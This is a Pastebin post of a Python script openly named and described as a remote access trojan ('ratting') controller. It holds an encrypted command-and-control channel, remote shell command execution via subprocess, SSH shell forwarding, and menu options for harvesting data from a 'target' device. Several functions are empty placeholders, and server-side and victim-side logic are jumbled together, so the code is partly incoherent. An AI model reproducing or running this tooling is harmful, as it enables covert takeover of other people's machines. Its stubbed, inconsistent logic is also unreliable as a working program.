Advertisement
WhosYourDaddySec

RattingLittleBitches.py

Nov 20th, 2023
159
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.75 KB | None | 0 0
  1. # RattingLittleBitches.py
  2.  
  3. import socket
  4. import subprocess
  5. import paramiko
  6. import threading
  7. from cryptography.hazmat.backends import default_backend
  8. from cryptography.hazmat.primitives import hashes
  9. from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
  10. from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
  11.  
  12. def establish_connection(host, port, key):
  13. server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  14. server_socket.bind((host, port))
  15. server_socket.listen(1)
  16.  
  17. client_socket, _ = server_socket.accept()
  18. shared_key = derive_shared_key(client_socket, key)
  19. return client_socket, shared_key
  20.  
  21. def derive_shared_key(client_socket, password):
  22. salt = client_socket.recv(16)
  23. kdf = PBKDF2HMAC(
  24. algorithm=hashes.SHA256(),
  25. iterations=100000,
  26. salt=salt,
  27. length=32,
  28. backend=default_backend()
  29. )
  30. key = kdf.derive(password.encode())
  31. return key
  32.  
  33. def encrypt(data, key):
  34. cipher = Cipher(algorithms.AES(key), modes.CFB(b'\0' * 16), backend=default_backend())
  35. encryptor = cipher.encryptor()
  36. encrypted_data = encryptor.update(data.encode()) + encryptor.finalize()
  37. return encrypted_data
  38.  
  39. def decrypt(encrypted_data, key):
  40. cipher = Cipher(algorithms.AES(key), modes.CFB(b'\0' * 16), backend=default_backend())
  41. decryptor = cipher.decryptor()
  42. decrypted_data = decryptor.update(encrypted_data) + decryptor.finalize()
  43. return decrypted_data.decode()
  44.  
  45. def send_command(client_socket, command, key):
  46. encrypted_command = encrypt(command, key)
  47. client_socket.send(encrypted_command)
  48.  
  49. def receive_output(client_socket, key):
  50. encrypted_response = client_socket.recv(4096)
  51. response = decrypt(encrypted_response, key)
  52. return response
  53.  
  54. def close_connection(client_socket):
  55. client_socket.close()
  56.  
  57. def execute_command(command):
  58. try:
  59. output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT, universal_newlines=True)
  60. except subprocess.CalledProcessError as e:
  61. output = f"Error: {e.output}"
  62.  
  63. return output
  64.  
  65. def forward_data(client_socket, remote_socket):
  66. while True:
  67. data = client_socket.recv(4096)
  68. remote_socket.send(data)
  69.  
  70. response = remote_socket.recv(4096)
  71. client_socket.send(response)
  72.  
  73. def start_ssh_forwarder(local_host, local_port, remote_host, remote_port, username, password):
  74. forwarder_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  75. forwarder_socket.bind((local_host, local_port))
  76. forwarder_socket.listen(1)
  77.  
  78. client_socket, _ = forwarder_socket.accept()
  79.  
  80. ssh = paramiko.SSHClient()
  81. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  82. ssh.connect(remote_host, port=22, username=username, password=password)
  83.  
  84. remote_socket = ssh.invoke_shell()
  85.  
  86. return client_socket, remote_socket
  87.  
  88. def handle_target_client(client_socket, key):
  89. command = receive_command(client_socket, key)
  90.  
  91. if command.startswith("advanced_command"):
  92. result = handle_advanced_logic(command)
  93. elif command.startswith("harvest_data"):
  94. result = harvest_device_data()
  95. else:
  96. result = execute_command(command)
  97.  
  98. send_output(client_socket, result, key)
  99.  
  100. def handle_advanced_logic(command):
  101. # Implement advanced logic based on the received command
  102. result = "Result of the advanced logic"
  103. return result
  104.  
  105. def harvest_device_data():
  106. # Implement data harvesting logic
  107. data = "All data harvested from the device"
  108. return data
  109.  
  110. def receive_command(client_socket, key):
  111. encrypted_command = client_socket.recv(4096)
  112. command = decrypt(encrypted_command, key)
  113. return command
  114.  
  115. def send_output(client_socket, output, key):
  116. encrypted_output = encrypt(output, key)
  117. client_socket.send(encrypted_output)
  118.  
  119. def expert_logic_example():
  120. # Implement additional expert logic here
  121. result = "This is an example of expert logic."
  122. return result
  123.  
  124. def execute_expert_command(command):
  125. # Implement execution of expert-level commands
  126. try:
  127. output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT, universal_newlines=True)
  128. except subprocess.CalledProcessError as e:
  129. output = f"Error: {e.output}"
  130.  
  131. return output
  132.  
  133. def advanced_data_harvesting():
  134. # Implement advanced data harvesting logic
  135. data = "Advanced data harvested from the device"
  136. return data
  137.  
  138. def help_menu():
  139. print("=== ToolForRattingBitches.py Help Menu ===")
  140. print("1. Basic Commands:")
  141. print(" - Type 'COMMAND_TO_SEND' to execute a command on the target.")
  142. print(" - Type 'exit' to close the connection.")
  143. print("2. Advanced Commands:")
  144. print(" - Type 'advanced_command' for advanced logic.")
  145. print(" - Type 'harvest_data' for data harvesting.")
  146. print("3. Expert Commands:")
  147. print(" - Type 'expert_logic' for an example of expert logic.")
  148. print(" - Type 'execute_expert' to execute an expert-level command.")
  149. print(" - Type 'advanced_harvest' for advanced data harvesting.")
  150. print("===========================================")
  151.  
  152. if __name__ == '__main__':
  153. password = "your_super_secret_password"
  154. client_socket, shared_key = establish_connection("127.0.0.1", 8000, password)
  155.  
  156. help_menu()
  157.  
  158. while True:
  159. user_input = input("Enter a command: ")
  160.  
  161. if user_input.lower() == 'exit':
  162. close_connection(client_socket)
  163. break
  164. elif user_input.lower() == 'help':
  165. help_menu()
  166. else:
  167. send_command(client_socket, user_input, shared_key)
  168. response = receive_output(client_socket, shared_key)
  169. print("Response: ", response)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement